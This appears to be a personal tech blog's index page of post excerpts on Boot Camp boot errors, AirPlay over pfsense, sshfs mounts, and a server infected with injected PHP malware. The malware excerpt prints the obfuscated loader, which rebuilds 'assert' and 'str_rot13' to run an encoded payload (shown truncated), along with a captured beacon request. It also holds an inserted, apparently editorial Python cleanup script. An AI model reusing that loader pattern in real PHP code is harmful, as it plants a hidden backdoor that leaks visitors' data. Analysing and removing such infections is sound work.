Fix INACCESSIBLE_BOOT_DEVICE with Boot Camp Windows Systems

Like any self-respecting computer geek, I like everything. I typically run-up Windows on my Macs by installing it via Boot Camp, and then booting it as a VM. This lets me run everything in parallel, but also go full native mode when needed.

Recently, I found I couldn’t boot my Windows natively any more, though it would still work fine in my VMware Fusion. When booting natively, my Windows install would BSOD on an INACCESSIBLE_BOOT_DEVICE exception. After a bit of googling, I found that this was likely related to storage drivers. I ultimately managed to fix my Windows environment (without a reinstall); here are the steps:

Read more “Fix INACCESSIBLE_BOOT_DEVICE with Boot Camp Windows Systems”

Battle against injected PHP

My main personal web server became infected with some effin malware that was injected into very nearly every single .php script on the server. The injected code was basically:

//###=CACHE START=###
@error_reporting(E_ALL);
@ini_set("error_log",NULL);
...etc

$strings = "as"; $strings .= "se";  $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r";  $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode");
$light =  $strings2($gbz.'("nJLtX...."));'); $strings($light);
//###=CACHE END=###

This is kind of beautiful to me, it took me a little while to figure out what it does. In effect it causes basic system info for anyone browsing sites on that server to be sent off to some other php script on another server. At first I altered the server and my network to prevent any traffic from reaching the intended target. Instead I captured the traffic so I could get a look at the volume of it. Here’s an example Apache log message generated by someone browsing an infected site:

- (127.0.0.1) - - [13/Nov/2016:14:01:20 -0700] "GET /get.php?ip=192.168.1.200&d=mysite.com%2Fclass-aptent-taciti-sociosqu-ad-litora%2F&u=Mozilla%2F5.0+%28iPhone%3B+CPU+iPhone+OS+7_0+like+Mac+OS+X%29+AppleWebKit%2F537.51.1+%28KHTML%2C+like+Gecko%29+Version%2F7.0+Mobile%2F11A465+Safari%2F9537.53+%28compatible%3B+bingbot%2F2.0%3B+%2Bhttp%3A%2F%2Fwww.bing.com%2Fbingbot.htm%29&i=1&h=85f7d3bd42bb5caa72817bcd75723fbc HTTP/1.0" 404 466 "-" "-"

After kind of a lot of effort, I came up with a script that purged this malware from my server’s file system. SUuuuuure I could have restored from backup, but that’s not nearly as interesting or dangerous.

Here’s the searchAndDestroy script I came up with.
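
The searchAndDestroy script itself is not reproduced on this page. As a separate added example (not the author's script), here is one way to find and strip the block between the two `CACHE` marker comments shown above; the function names and the sample files are constructed for illustration, and it assumes the injected block always sits between those two markers.

```python
import re
import tempfile
from pathlib import Path

# Marker comments exactly as shown in the injected block above.
START = b"//###=CACHE START=###"
END = b"//###=CACHE END=###"
BLOCK = re.compile(re.escape(START) + rb".*?" + re.escape(END) + rb"[ \t]*\r?\n?", re.DOTALL)

def strip_injection(source: bytes):
    """Return (cleaned, status); status is 'clean', 'infected' or 'unterminated'."""
    cleaned, count = BLOCK.subn(b"", source)
    if START in cleaned or END in cleaned:
        # A marker without its partner: refuse to guess where the payload ends.
        return source, "unterminated"
    return (cleaned, "infected") if count else (source, "clean")

def scan_tree(root, fix=False):
    """Report status per *.php file under root; rewrite files only when fix=True."""
    report = {}
    for path in sorted(Path(root).rglob("*.php")):
        original = path.read_bytes()  # bytes, so encodings and line endings survive
        cleaned, status = strip_injection(original)
        report[path.relative_to(root).as_posix()] = status
        if fix and status == "infected":
            path.write_bytes(cleaned)
    return report

def demo():
    """Run against constructed sample files (not real captures) in a temp dir."""
    payload = START + b'\n@error_reporting(E_ALL);\n$s = "as";\n' + END + b"\n"
    samples = {
        "index.php": b"<?php\n" + payload + b"echo 'hello';\n",
        "lib/util.php": b"<?php\nfunction f() { return 1; }\n",
        "broken.php": b"<?php\n" + START + b"\n@ini_set('error_log', NULL);\n",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in samples.items():
            target = Path(tmp, name)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(body)
        dry_run = scan_tree(tmp)  # report only, nothing is rewritten
        untouched = Path(tmp, "index.php").read_bytes() == samples["index.php"]
        scan_tree(tmp, fix=True)  # second pass rewrites infected files
        return dry_run, untouched, Path(tmp, "index.php").read_bytes()

if __name__ == "__main__":
    print(demo())
```

Files reported as `unterminated` are left untouched for manual review, and stripping the block does not address however the files were modified in the first place.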

AirPlay Through pfsense Bridge

Howdy all, geek-mode enabled.

So I’ve been fighting somewhat to get my AirPlay enabled device (Apple TV) to function perfectly. I use pfsense to run my router and in so doing I’ve got a Wireless and Wired network that are bridged together. I found with the AppleTV that only devices on the same physical media could stream to it, though all devices could “see” it.

Read more “AirPlay Through pfsense Bridge”

Ubuntu 9.10 remote mounts via sshfs

Hey just a fast post here.. I’ve been using sshfs on Ubuntu (meh, linux in general) for a while as a means of securely remotely accessing my files. I’ve taken some steps to add a line to my /etc/fstab file to make this run smoothly…

Though today I ran into a really weird situation. I found that despite having a uid=xxxx line, the appropriate user wasn’t getting ownership of the mount. In fact, when that user would look at the permissions for the mount, it returned something like “d???? ? ? ?”. Whisky Tango Foxtrot.

Well, turned out the problem was a result of how I had my fstab arranged.

Read more “Ubuntu 9.10 remote mounts via sshfs”